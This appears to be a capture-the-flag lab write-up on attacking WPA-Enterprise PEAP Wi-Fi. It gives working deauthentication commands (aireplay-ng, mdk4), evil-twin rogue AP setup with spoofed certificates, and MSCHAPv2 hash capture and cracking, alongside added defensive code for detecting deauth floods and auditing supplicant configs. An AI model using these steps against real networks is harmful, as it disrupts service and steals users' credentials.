Enterprise WiFi Hacking: MGT / EAP-PEAP
Introduction
Enterprise (MGT) networks use centralised authentication. Your goal is to identify user identities and perform an Evil Twin attack to capture credentials.
EAP Hammer Automation
Phase 1: Task 1 - Reconnaissance
In this phase, you will identify the username, EAP type, and certificate details being used by the target. We need to capture the EAP handshake.
Enable Monitor Mode:
airmon-ng start wlan0
Locate the Target: Scan for the Enterprise network:
airodump-ng --band abg wlan7mon

Capture Traffic: Lock onto the channel and BSSID to save a pcap

Simpler Deauth (you don't need to worry about the client; you can deauth all of them):
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon
aireplay-ng → Part of the Aircrack-ng suite, used for packet injection.
-0 → Specifies a deauthentication attack.
10 → Number of deauth packets to send (in this case, 10 packets).
-a F0:9F:C2:71:22:12 → BSSID (MAC address of the target AP).
wlan0mon → The wireless interface in monitor mode.

Deauth cheat sheet
Look for the "WPA handshake" notification in the airodump-ng output.

Analyze in Wireshark: Open the capture and apply these filters to find sensitive data:
Filter 1: eap (to see general EAP traffic).
Filter 2: eap.type (to confirm it is Protected EAP (EAP-PEAP)). Knowing the supported method dictates your next move. For example, if the server supports PEAP or EAP-TTLS, you can proceed with the Rogue AP (Evil Twin) attack.
Filter 3: eap.identity (to find the username, e.g., [email protected]).
Filter 4: x509af.subject (to gather information on the server certificate).

We can also use tshark to extract this information,

or, to be specific:

Finding the identity with tshark
We can use Wireshark filtered by "eap" and look for packets with "Response, Identity".
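The filters above work because the outer EAP exchange is not encrypted: the Identity response and the method the authenticator proposes travel in the clear inside EAPOL frames, which is exactly what eap.identity and eap.type pick out. The following parser, added here as an illustration and not part of the original write-up or of any tool it mentions, decodes the RFC 3748 EAP header from EAPOL payloads and reports what a passive listener learns. It assumes the 802.11 and LLC/SNAP headers have already been stripped (as tshark's eap dissector does), and the frames it runs on are constructed in the block, not captured traffic.

```python
import struct
from typing import Dict, List, Optional

# RFC 3748 EAP codes and the EAP method types relevant to enterprise Wi-Fi.
EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
EAP_TYPES = {1: "Identity", 2: "Notification", 3: "Nak", 13: "EAP-TLS",
             21: "EAP-TTLS", 25: "EAP-PEAP", 26: "EAP-MSCHAPv2"}


def parse_eap(payload: bytes) -> Dict[str, object]:
    """Parse one EAP packet: Code(1) Id(1) Length(2) [Type(1) Type-Data]."""
    if len(payload) < 4:
        raise ValueError("EAP header truncated")
    code, ident, length = struct.unpack("!BBH", payload[:4])
    if length < 4 or length > len(payload):
        raise ValueError("EAP Length field inconsistent with buffer")
    pkt: Dict[str, object] = {"code": EAP_CODES.get(code, "unknown"), "id": ident}
    if code in (1, 2) and length >= 5:          # only Request/Response carry a Type
        eap_type = payload[4]
        pkt["type_code"] = eap_type
        pkt["type"] = EAP_TYPES.get(eap_type, "unknown(%d)" % eap_type)
        if eap_type == 1:                         # Identity: Type-Data is the cleartext NAI
            pkt["identity"] = payload[5:length].decode("utf-8", errors="replace")
    return pkt


def parse_eapol(frame: bytes) -> Optional[Dict[str, object]]:
    """Strip the EAPOL header (Version, Type, Length). Only Type 0 (EAP-Packet) is EAP;
    Type 3 (EAPOL-Key, the 4-way handshake) carries no identities and is skipped."""
    if len(frame) < 4:
        return None
    _version, ptype, length = struct.unpack("!BBH", frame[:4])
    if ptype != 0:
        return None
    return parse_eap(frame[4:4 + length])


def summarize_exchange(frames: List[bytes]) -> Dict[str, object]:
    """What a passive listener learns from the outer EAP exchange: identities sent in
    the clear and the methods the authenticator proposed (what eap.identity / eap.type show)."""
    identities: List[str] = []
    offered = set()
    for frame in frames:
        pkt = parse_eapol(frame)
        if pkt is None:
            continue
        if pkt["code"] == "Response" and "identity" in pkt:
            identities.append(pkt["identity"])
        if pkt["code"] == "Request" and pkt.get("type_code", 0) > 3:
            offered.add(pkt["type"])
    return {"identities": identities, "methods_offered": sorted(offered)}


# --- Constructed sample frames (not captured traffic) -------------------------
def _eap(code: int, ident: int, eap_type: Optional[int] = None, data: bytes = b"") -> bytes:
    body = b"" if eap_type is None else bytes([eap_type]) + data
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def _eapol(eap: bytes) -> bytes:
    return struct.pack("!BBH", 2, 0, len(eap)) + eap   # EAPOL v2, Type 0 = EAP-Packet


SAMPLE_FRAMES = [
    _eapol(_eap(1, 1, 1)),                                  # AP: Request/Identity
    _eapol(_eap(2, 1, 1, b"user1@example.test")),           # client: Response/Identity (cleartext)
    _eapol(_eap(1, 2, 25, b"\x20")),                        # AP: Request/PEAP, Start flag
    struct.pack("!BBH", 2, 3, 2) + b"\x00\x00",             # EAPOL-Key stub, ignored
    _eapol(_eap(2, 2, 25, b"\x80\x00\x00\x00\x03\x16\x03\x01")),  # client: PEAP TLS fragment
]

if __name__ == "__main__":
    print(summarize_exchange(SAMPLE_FRAMES))
```

Running the block on the constructed exchange reports the identity user1@example.test and EAP-PEAP as the offered method. On the defensive side this is the argument for configuring an anonymous outer identity on supplicants (for example anonymous@realm): the real username then only appears inside the TLS tunnel, and the outer exchange leaks no more than the realm.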

Alternate method to check authentication type
Once we have a valid user, we can force each of the EAP authentication methods to verify which methods the AP supports. We can use "EAP_buster" for this task.

Phase 2: Task 2 - Evil Twin Attack
Now that you have the username and certificate details, you will create a malicious AP to steal the user's password hash.
Stop Collection:
airmon-ng check kill
Create a Look-alike Certificate: Use the Eaphammer wizard to generate a certificate that mimics the target:
cd /home/rogue1/opt/eaphammer
./eaphammer --cert-wizard


Launch the Evil Twin: Run the attack to negotiate a connection and capture the MSCHAPv2 hash:

Or we can run our AP without the same MAC (I think this is better).

Capture the Hash: When the client connects, you will see a NETNTLM (MSCHAPv2) hash in the terminal.

Deauthenticate the existing Clients
With "airodump-ng" we detect the MACs of the clients in order to perform a deauthentication attack. We run this attack on both clients in parallel. As there are 2 APs, we have to perform the attack against both APs, since a client disconnected from one may reconnect to the other instead of to our Rogue AP.


Or we can run airodump-ng on a single channel and then perform the deauth in this manner; the channel then stays the same for the aireplay-ng deauth attack.
Option B: Bulk Deauthentication (mdk4) – RECOMMENDED
This is the most efficient method for Enterprise environments as it can target multiple APs simultaneously.
1. Create a Target File: If there are multiple APs, save their MAC addresses to a list.
2. Execute the Attack: Ensure your interface is in monitor mode and on the correct channel before running the command.
Method 1: Using the Target File
Note: The -b flag points to your list of BSSIDs.
Method 2: Deauth by ESSID (Simpler)
Note: This targets all APs broadcasting that specific network name.
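Both deauth variants on this page (the targeted aireplay-ng -0 burst earlier and the bulk mdk4 method here) have the same footprint from the network's side: a run of deauthentication or disassociation frames, often to the broadcast address, far denser than any real AP produces. The detector below is an added example, not code from the original write-up or from mdk4/aircrack-ng. It assumes the monitor-mode capture has already been reduced to (timestamp, subtype, bssid, destination) tuples, which is what a WIDS sensor or a tshark field export would give you; the records it runs on are constructed in the block.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, Iterable, List, Tuple

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH_SUBTYPES = {"deauth", "disassoc"}

# A record is (timestamp_seconds, frame_subtype, bssid, destination_mac).
Record = Tuple[float, str, str, str]


def detect_deauth_floods(records: Iterable[Record], window_s: float = 1.0,
                         threshold: int = 5) -> List[Dict[str, object]]:
    """Sliding-window rate check per BSSID. A genuine AP sends the occasional deauth
    (idle timeout, roaming); a burst of >= threshold deauth/disassoc frames within
    window_s, especially to the broadcast address, is the signature of a deauth flood."""
    windows: Dict[str, Deque[Tuple[float, str]]] = defaultdict(deque)
    active = set()                    # BSSIDs already alerted in the current burst
    alerts: List[Dict[str, object]] = []
    for ts, subtype, bssid, dst in sorted(records, key=lambda r: r[0]):
        if subtype not in DEAUTH_SUBTYPES:
            continue
        q = windows[bssid]
        q.append((ts, dst))
        while q and ts - q[0][0] > window_s:   # drop frames outside the window
            q.popleft()
        if len(q) < threshold:
            active.discard(bssid)              # burst over: re-arm for the next one
        elif bssid not in active:
            active.add(bssid)
            alerts.append({
                "bssid": bssid,
                "start": q[0][0],
                "count": len(q),
                "broadcast": any(d == BROADCAST for _, d in q),
            })
    return alerts


# Constructed sample (not a real capture): one legitimate deauth, a couple of
# stray frames from a second BSSID, then an 8-frame broadcast burst from the first.
SAMPLE_RECORDS: List[Record] = [
    (0.50, "deauth", "02:00:00:00:aa:01", "02:00:00:00:cc:01"),   # idle-timeout deauth
    (1.00, "data", "02:00:00:00:aa:01", "02:00:00:00:cc:02"),
    (5.20, "disassoc", "02:00:00:00:aa:02", "02:00:00:00:cc:03"),
    (5.60, "deauth", "02:00:00:00:aa:02", "02:00:00:00:cc:03"),
    (10.00, "deauth", "02:00:00:00:aa:01", BROADCAST),             # burst begins
    (10.05, "deauth", "02:00:00:00:aa:01", BROADCAST),
    (10.10, "deauth", "02:00:00:00:aa:01", BROADCAST),
    (10.15, "deauth", "02:00:00:00:aa:01", BROADCAST),
    (10.20, "deauth", "02:00:00:00:aa:01", BROADCAST),             # 5th within 1 s: alert
    (10.25, "deauth", "02:00:00:00:aa:01", BROADCAST),
    (10.30, "deauth", "02:00:00:00:aa:01", BROADCAST),
    (10.35, "deauth", "02:00:00:00:aa:01", BROADCAST),
]

if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_RECORDS):
        print(alert)
```

The threshold and window are deliberately parameters: a busy AP with many idle clients can legitimately exceed five deauths per second at shift changes, so tune against a baseline of the site's normal rate. Detection is the fallback; the mitigation is 802.11w (Protected Management Frames), which authenticates deauth and disassoc frames so that clients discard forged ones instead of dropping off the network.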
Phase 3: Cracking the Hash
Once you have the hash (e.g., [email protected]::::...), save it to a file named hashes.txt.
Option A: Hashcat:
Option B: John the Ripper:
Method 2: FreeRADIUS + hostapd-mana
Phase 1: Certificate Configuration
You must modify the FreeRADIUS configuration files to match the target organization's details found during your reconnaissance.
1. Edit CA Configuration
Command:
sudo nano /etc/freeradius/3.0/certs/ca.cnf
Update the [certificate_authority] section:
countryName = ES
stateOrProvinceName = Madrid
localityName = Madrid
organizationName = WiFiChallenge
emailAddress = [email protected]
commonName = "WiFiChallenge CA"
2. Edit Server Configuration
Command:
sudo nano /etc/freeradius/3.0/certs/server.cnf
Update the [server] section:
countryName = ES
stateOrProvinceName = Madrid
localityName = Madrid
organizationName = WiFiChallenge
emailAddress = [email protected]
commonName = "WiFiChallenge Server"
Phase 2: Certificate Generation & User Setup
1. Generate New Certificates: Switch to root to refresh the Diffie-Hellman parameters and build the certificates.
2. Create EAP User File: This file tells the Rogue AP which authentication protocols to negotiate with victims.
Phase 3: Launching the Attack
1. Create the hostapd-mana Config: Save this as /tmp/network.conf. Ensure the ssid matches your target variable.
It is better to match the channel and use this:
2. Execution: Reset your interface and start the Rogue AP.
3. Deauthenticate Targets: In a new terminal, kick clients off the real APs to force them toward your Rogue AP.
By ESSID (Recommended):
sudo mdk4 wlan1 d -c ${channel} -E ${essid}
Targeted:
sudo aireplay-ng -0 0 -e ${essid} -a ${bssid} wlan1
Phase 4: Cracking the Hash
Once a client connects, hostapd-mana will display a hash in the format: user::::challenge:response.
Save the hash:
echo 'user::::challenge:response' > /tmp/hash.txt
Crack with Hashcat:
Note: Mode -m 5500 is for NetNTLMv1 / MSCHAPv2.
Cracking with John
Phase 5: Final Connection
After cracking the password, use wpa_supplicant with a client.conf file (specifying key_mgmt=WPA-EAP and phase2="auth=MSCHAPV2") to connect and retrieve the flag from 192.168.1.1.
Use this after you have cracked the domain credentials from your Rogue AP.
Sample Config File (/tmp/client.conf):
Connection Instructions:
Connect: Run sudo wpa_supplicant -i wlan0 -c /tmp/client.conf
Get IP: Run sudo dhclient wlan0 -v
Get Flag: Run curl http://192.168.1.1/proof.txt
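Everything in Phases 2 through 4 works only because the victim's supplicant accepts the look-alike certificate from the Rogue AP. The same wpa_supplicant settings used here to connect (key_mgmt=WPA-EAP, phase2="auth=MSCHAPV2") are therefore also where the defence lives: ca_cert plus a server-name match makes a client refuse a rogue RADIUS server, and anonymous_identity keeps the real username out of the cleartext outer exchange. The auditor below is an added example, not part of the original page and not the page's own client.conf; the config it parses is constructed in the block (SSID, paths, realm and identity are placeholders), with a weak block alongside a hardened one.

```python
import re
from typing import Dict, List, Tuple

NETWORK_RE = re.compile(r"network\s*=\s*\{(.*?)\}", re.S)
PINNING_KEYS = ("domain_suffix_match", "domain_match", "altsubject_match", "subject_match")
TUNNELED_METHODS = ("PEAP", "TTLS")


def parse_networks(text: str) -> List[Dict[str, str]]:
    """Split a wpa_supplicant config into its network={...} blocks as key/value dicts."""
    nets = []
    for body in NETWORK_RE.findall(text):
        kv: Dict[str, str] = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            kv[key.strip()] = value.strip().strip('"')
        nets.append(kv)
    return nets


def audit_network(net: Dict[str, str]) -> List[str]:
    """Return the reasons a WPA-EAP network block would accept a rogue RADIUS server."""
    findings: List[str] = []
    if "WPA-EAP" not in net.get("key_mgmt", "").split():
        return findings                           # PSK/open networks: out of scope here
    if not net.get("ca_cert"):
        findings.append("no ca_cert: any server certificate is accepted, so a rogue AP "
                        "with a look-alike certificate completes the TLS tunnel")
    if not any(k in net for k in PINNING_KEYS):
        findings.append("no domain_suffix_match/domain_match/altsubject_match: any "
                        "certificate chaining to the CA is accepted, not just the real server's")
    if net.get("eap") in TUNNELED_METHODS and not net.get("anonymous_identity"):
        findings.append("no anonymous_identity: the real username is sent in the cleartext "
                        "outer Identity response")
    return findings


def audit_config(text: str) -> List[Tuple[str, List[str]]]:
    """Audit every network block; returns (ssid, findings) pairs."""
    return [(net.get("ssid", "?"), audit_network(net)) for net in parse_networks(text)]


# Constructed sample config (not the page's client.conf): the first block is the
# typical weak layout; the second pins the CA and server name and hides the username.
SAMPLE_CONF = """
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user1@example.test"
    password="PLACEHOLDER"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous@example.test"
    identity="user1@example.test"
    password="PLACEHOLDER"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.example.test"
    phase2="auth=MSCHAPV2"
}
"""

if __name__ == "__main__":
    for ssid, findings in audit_config(SAMPLE_CONF):
        print(ssid, "OK" if not findings else "\n  - " + "\n  - ".join(findings))
```

The first block reports three findings and the second none. The ca_cert check matters most: without it wpa_supplicant performs no chain validation at all, which is the client behaviour the --cert-wizard certificate relies on. On managed fleets the equivalent settings are pushed by MDM or group policy rather than hand-edited, but the three checks are the same.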